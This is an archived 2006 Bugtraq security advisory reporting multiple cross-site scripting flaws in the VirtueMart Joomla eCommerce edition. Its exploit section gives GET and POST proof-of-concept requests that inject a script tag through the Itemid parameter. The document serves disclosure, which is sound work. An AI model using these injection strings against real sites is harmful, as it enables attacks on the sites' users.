lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <572e7d720609270111s64b3ea59pd0d39acdefa304f3@mail.gmail.com>
Date: Wed, 27 Sep 2006 01:11:04 -0700
From: Base64 <base640@...il.com>
To: bugtraq@...urityfocus.com
Subject: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities


Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low


Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ